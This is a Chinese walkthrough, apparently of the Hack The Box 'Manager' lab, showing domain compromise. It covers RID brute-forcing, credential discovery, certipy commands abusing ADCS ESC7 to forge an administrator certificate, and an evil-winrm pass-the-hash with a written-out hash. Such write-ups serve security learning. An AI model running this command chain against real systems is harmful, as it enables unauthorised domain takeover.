当前位置: 首页 > ai >正文

CPTS-Manager ADCS ESC7利用

ai 2025/9/5 14:03:58

枚举和利用

端口扫描
nmap -A -p- -n -Pn -T4 10.10.11.236

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-03 21:17:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-09-03T21:19:05+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-03T21:19:05+00:00; 0s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-09-03T21:19:05+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-09-03T13:04:19
|_Not valid after:  2055-09-03T13:04:19
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2025-09-03T21:19:05+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-03T21:19:05+00:00; 0s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
49796/tcp open  msrpc         Microsoft Windows RPC
62137/tcp open  msrpc         Microsoft Windows RPC
63109/tcp open  tcpwrapped
63143/tcp open  msrpc         Microsoft Windows RPC

在这里插入图片描述
枚举smb共享
在这里插入图片描述
尝试rid爆破
nxc smb 10.10.11.236 -u ‘guest’ -p ‘’ --rid-brute --smb-timeout 10000
在这里插入图片描述
经过文本处理 可以得到用户名列表
在这里插入图片描述
验证有效用户名
在这里插入图片描述
首字母小写
在这里插入图片描述
得到凭证
在这里插入图片描述
bloodhound信息收集
bloodhound-python --dns-tcp -ns 10.10.11.236 -d ‘manager.htb’ -u ‘operator’ -p ‘operator’ -c All --zip -v
在这里插入图片描述
smb共享枚举
在这里插入图片描述
进入mssql
在这里插入图片描述
枚举网页路径c:\inetpub\wwwroot
在这里插入图片描述
发现一个zip,下载
在这里插入图片描述
解压
在这里插入图片描述
找到一个密码
在这里插入图片描述
该用户可以通过winrm拿到shell
在这里插入图片描述
成功拿到shell
在这里插入图片描述

ESC7 提权

尝试adcs枚举
在这里插入图片描述

certipy-ad ca -u raven@manager.htb -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -ca manager-dc01-ca -add-officer raven

在这里插入图片描述
我们可以签发和管理证书。

在这里插入图片描述
可以使用-list-templates标志列出启用的证书模板。
certipy-ad ca -u raven@manager.htb -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -ca manager-dc01-ca -list-templates
在这里插入图片描述
certipy-ad req -u raven@manager.htb -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
在这里插入图片描述
certipy-ad ca -u raven@manager.htb -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -ca manager-dc01-ca -issue-request 19
在这里插入图片描述
最后,我们使用req命令和-retrieve 参数。
certipy-ad req -u raven@manager.htb -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -ca manager-dc01-ca -retrieve 19
在这里插入图片描述

certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
拿到hash
在这里插入图片描述
evil-winrm -i 10.10.11.236 -u ‘Administrator’ -H ‘ae5064c2f62317332c88629e025924ef’
在这里插入图片描述
成功提权

http://www.xdnf.cn/news/19967.html

相关文章:

  • HTML图片标签及路径详解
  • 代码随想录训练营第三十一天|LeetCode56.合并区间、LeetCode738.单调递增的数字
  • freertos下printf(“hello\r\n“)和printf(“hello %d\r\n“,i)任务堆栈消耗有何区别
  • 金贝 KA Box 1.18T:一款高效能矿机的深度解析
  • Python 第三方自定义库开发与使用教程
  • Redis是单线程的,为啥那么快呢?经典问题
  • 第六章 Cesium 实现简易河流效果
  • 热计量表通过M-Bus接口实现无线集抄系统的几种解决方
  • 2025国赛C题题目及最新思路公布!
  • ubuntu20.04配置运行ODM2.9.2教程,三维重建,OpenDroneMap/ODM2.9.2
  • 智能家居芯片:技术核心与创新突破
  • Spring Cloud Ribbon 核心原理
  • 数字化转型:从锦上添花到生存必需——2025年零售行业生存之道
  • Function Call实战:用GPT-4调用天气API,实现实时信息查询
  • Matlab中的积分——函数int()和quadl()
  • PDF24 Creator:免费的多功能PDF工具
  • OPC UA双层安全认证模型解析
  • 【蓝桥杯选拔赛真题64】C++最大空白区 第十四届蓝桥杯青少年创意编程大赛 算法思维 C++编程选拔赛真题解
  • 大小端存储的理解与判断方法
  • Cypress 测试框架:轻松实现端到端自动化测试!
  • 从零开始的python学习——元组
  • PostgreSQL与SQL Server:B树索引差异及去重的优势
  • Webus 与中国国际航空合作实现 XRP 支付
  • DeepSeek文献太多太杂?一招制胜:学术论文检索的“核心公式”与提问艺术
  • Java+Vue构建的MES智能管理系统,集成生产计划、执行、监控与优化功能,支持产品、车间、工艺、客户、供应商等多维度管理,含完整源码,助力企业高效生产
  • LeetCode算法日记 - Day 31: 判定是否互为字符重排、存在重复元素
  • nextcyber——常见应用攻击
  • Dubbo分布式服务框架全解析
  • 轻松上手 qData 数据中台开源版:Docker Compose 助你10分钟跑起来
  • matlab薄透镜对物体成像